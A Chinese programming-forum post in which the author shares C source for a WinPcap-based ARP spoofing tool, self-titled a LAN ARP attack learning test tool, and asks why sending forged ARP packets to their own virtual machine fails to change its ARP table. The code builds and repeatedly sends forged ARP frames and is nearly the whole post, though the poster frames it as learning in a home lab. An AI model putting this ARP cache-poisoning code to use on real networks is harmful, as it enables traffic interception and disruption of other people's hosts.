这winPcap的ARP有没有用?
程序代码:#define REMOTE_HOST
#include<stdio.h>
#include<stdlib.h>
#include"pcap.h"
#include"remote-ext.h"
#pragma comment(lib,"wpcap.lib")
int main(int argc,char **argv){
pcap_t *fp;
char errbuf[PCAP_ERRBUF_SIZE+1];
u_char packet[100];
int j;
pcap_if_t *alldevs;
pcap_if_t *d;
int inum;
int i=0,m,n;
if(pcap_findalldevs_ex(PCAP_SRC_IF_STRING,NULL,&alldevs,errbuf)==-1){
fprintf(stderr,"Error in pcap_findalldevs:%s\n",errbuf);
exit(1);
}
/*打印列表*/
for(d=alldevs;d;d=d->next){
printf("%d.%s\n",++i,d->name);
if(d->description){
printf("(%s)\n",d->description);
}
else{
printf("(No description\n)");
}
}
if(i==0){
printf("No Interfaces found ! Make sure wincap is installed \n");
return -1;
}
printf("Enter the interface number (1-%d),pls",i);
scanf("%d",&inum);
if(inum<1 || inum>i){
printf("\ninterface number out of range\n");
/*释放设备列表*/
pcap_freealldevs(alldevs);
return -1;
}
/*跳转到被选中的设备*/
for(d=alldevs,i=0;i<inum-1;d=d->next,i++);
/*打开输出设备*/
if((fp=pcap_open(d->name,100,PCAP_OPENFLAG_PROMISCUOUS,1000,NULL,errbuf))==NULL){
fprintf(stderr,"\nUable to open the adapter.%s is not supported by Winpcap\n",argv[1]);
return -1;
}
printf("************局域网ARP攻击学习测试工具**************\n");
/*目的主机的MAC地址*/
printf("请输入路由器的MAC地址(例:ff:ff:ff:ff:ff:ff)\n");
scanf("%2x:%2x:%2x:%2x:%2x:%2x",&packet[0],&packet[1],&packet[2],&packet[3],&packet[4],&packet[5]);
/*设置MAC源地址*/
printf("请输入攻击者的IP对应的MAC地址(例如FF:FF:FF:FF:FF:FF)\n");
scanf("%2x:%2x:%2x:%2x:%2x:%2x",&packet[6],&packet[7],&packet[8],&packet[9],&packet[10],&packet[11]);
/*帧类型*/
packet[12]=0x08; //arp
packet[13]=0x06; //arp
/*arp报文*/
packet[14]=0x00; //hardware_type
packet[15]=0x01; //ethernet
packet[16]=0x08; //protocol type
packet[17]=0x00; //ip
packet[18]=0x06; //hardware_addr length
packet[19]=0x04; //protocol_addr length
packet[20]=0x00; //arp_type: reply :2
printf("请输入是什么类型的ARP:(1.arp请求(request)2.arp应答(reply))\n");
scanf("%2x",&packet[21]);
for(i=22;i<28;i++){
packet[i]=packet[i-16]; //src mac_address
}
printf("请输入攻击者的IP地址(x.x.x.x)\n"); //src ip_address or under attacked host ip_address
scanf("%d.%d.%d.%d",&packet[28],&packet[29],&packet[30],&packet[31]);
for(i=32;i<38;i++){ //destination mac_address
packet[i]=packet[i-32];
}
printf("请输入目标主机的IP地址(如x.x.x.x)\n"); //destination ip_address
scanf("%d.%d.%d.%d",&packet[38],&packet[39],&packet[40],&packet[41]);
for(i=42;i<60;i++){ //填充成Ethernet长度
packet[i]=0x00;
}
printf("attraking %d.%d.%d.%d\n",packet[38],packet[39],packet[40],packet[41]);
/*发送数据包*/
printf("请输入要发送的次数\n");
scanf("%d",&i);
while(i-->0){
if(pcap_sendpacket(fp,packet,60/*sizeof packet*/)!=0){
fprintf(stderr,"can not send the packet:%s\n",pcap_geterr(fp));
}
else{
printf("success!\n",i);
}
Sleep(1000);
}
return 0;
}
发送出去的时候 我用的是我的输入顺序是:
1
fe:e3:4f:a1:23:56(我虚拟机的真实MAC)
34:54:fe:ff:2d:ad(我自己编的主机的MAC)
192.168.1.101(我的主机内网地址)
192.168.1.102(虚拟机的内网地址)
10
怎么我虚拟机上的对应的192.168.1.101 MA MAPPING表没有改变甚至说没有收到呢?
请帮忙解答下! 这个是用WINPCAP 构造的ARP包,谢谢各位了
